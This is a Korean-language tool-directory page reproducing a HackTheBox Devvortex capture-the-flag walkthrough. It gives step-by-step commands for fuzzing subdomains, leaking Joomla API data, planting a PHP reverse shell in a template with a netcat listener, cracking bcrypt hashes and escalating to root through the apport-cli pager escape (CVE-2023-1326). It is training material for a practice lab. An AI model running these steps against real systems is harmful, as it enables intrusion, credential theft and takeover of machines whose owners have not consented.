Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
DEVVORTEX — HackTheBox Devvortex 워크스루: 서브도메인 퍼징, Joomla API 열거, 템플릿 기반 웹 셸, bcrypt 해시 크래킹, Apport-CLI CVE-2023-1326 권한 상승을 다룹니다. | Kitploit
도구/GitHubGitHub/r3fr4kt/devvortex
Password CrackingPrivilege EscalationVulnerability AnalysisWeb Application ExploitationInformation GatheringCTFPenetration TestingSubdomain EnumerationLearning & EducationLabs & Practice
GitHubr3fr4kt/devvortex
7시간 58분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

DEVVORTEX

HackTheBox Devvortex 워크스루: 서브도메인 퍼징, Joomla API 열거, 템플릿 기반 웹 셸, bcrypt 해시 크래킹, Apport-CLI CVE-2023-1326 권한 상승을 다룹니다.

저장소 보기

DEVVORTEX

HackTheBox: Devvortex — 머신 라이트업

HackTheBox의 Devvortex 머신을 장악하는 과정을 상세히 다룬 종합 기술 워크스루입니다. 이 경로는 초기 접근을 위한 서브도메인 퍼징, Joomla API 열거, 템플릿 수정, 측면 이동을 위한 데이터베이스 해시 추출 및 크래킹, 그리고 루트 권한 상승을 위한 Apport-CLI (CVE-2023-1326) 악용을 보여줍니다.


요약

  • 대상 OS: Linux
  • 난이도: Easy
  • 도메인: devvortex.htb
  • 서브도메인: dev.devvortex.htb
  • 핵심 개념: 서브도메인 열거, Joomla CMS 악용, 정보 노출, Bcrypt 해시 크래킹, Sudo 악용 (apport-cli).

1. 정찰 및 열거

포트 스캐닝 (Nmap)

전체 포트에 대해 초기 고속 TCP 포트 탐색을 수행했습니다:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

이후 식별된 열린 포트에 대해 서비스 및 버전 탐지 스캔을 실행했습니다:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

호스트 파일 구성

로컬 호스트 이름 확인 테이블에 기본 대상 도메인을 추가합니다:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

서브도메인 탐색 (FFUF)

추가 웹 자산을 식별하기 위해 가상 호스트를 퍼징합니다:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

결과: dev.devvortex.htb를 발견했습니다. /etc/hosts에 dev.devvortex.htb를 추가했습니다.

디렉터리 퍼징

새로 발견된 가상 호스트의 경로를 열거합니다:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

결과: /administrator 엔드포인트를 발견했으며, Joomla 관리자 인증 포털이 노출되었습니다.

2. 초기 접근 (발판 확보)

Joomla API를 통한 정보 유출

민감한 애플리케이션 지표와 사용자를 수집하기 위해 Joomla의 REST API가 노출한 공개 엔드포인트를 탐색합니다:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

사이트 템플릿을 통한 웹 셸 주입

열거 과정에서 발견한 자격 증명을 사용하여 Joomla /administrator 포털에 로그인합니다:

  1. System > Site Templates로 이동합니다.

  2. 활성 템플릿을 선택하고 error.php를 엽니다.

  3. error.php의 내용을 표준 PHP 리버스 셸 페이로드로 교체합니다.

로컬 netcat 리스너를 초기화합니다:

Bash

root@kitploit:~
nc -lvnp 4444

존재하지 않는 페이지를 요청하거나 파일에 직접 접근하여 error.php의 실행을 트리거합니다.

TTY 셸 안정화

셸이 www-data로 연결되면 대화형 PTY 세션을 생성합니다:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. 측면 이동 (Logan)

데이터베이스 열거

웹 구성 파일에서 검색한 자격 증명을 사용하여 로컬 MySQL 데이터베이스에 접근합니다:

Bash

root@kitploit:~
mysql -u lewis -p

사용자 테이블을 조회하여 저장된 자격 증명 해시를 찾습니다:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

오프라인 비밀번호 크래킹

사용자 logan의 bcrypt 비밀번호 해시를 로컬 파일로 추출합니다:

Bash

root@kitploit:~
nano hash.txt

John the Ripper와 rockyou.txt를 함께 사용하여 해시를 크래킹합니다:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

SSH를 통한 인증

크래킹된 자격 증명으로 사용자 logan으로 지속적인 SSH 세션을 설정합니다:

Bash

root@kitploit:~
ssh [email protected]

사용자 플래그

Bash

root@kitploit:~
cat user.txt

4. 권한 상승

Sudo 권한 감사

logan 사용자에게 허용된 바이너리를 검사합니다:

Bash

root@kitploit:~
sudo -l

출력: 사용자는 /usr/bin/apport-cli를 root로 실행할 수 있습니다.

Apport-CLI 악용 (CVE-2023-1326)

설치된 apport-cli 버전을 확인합니다:

Bash

root@kitploit:~
apport-cli --version

/var/crash에서 기존 보고서 파일을 검사합니다. 비어 있으면 크래시 파일을 수동으로 생성합니다:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

sudo를 사용하여 생성한 크래시 파일에 대해 apport-cli를 실행합니다:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. v를 눌러 View report를 선택합니다.

  2. 페이지네이터(less)가 내용을 로드하면 다음을 입력하여 시스템 셸로 탈출합니다:

Plaintext

root@kitploit:~
!/bin/bash

5. 시스템 장악

root 권한 상승을 확인합니다:

Bash

root@kitploit:~
whoami
# Output: root

루트 플래그

Bash

root@kitploit:~
cat /root/root.txt
도구 다운로드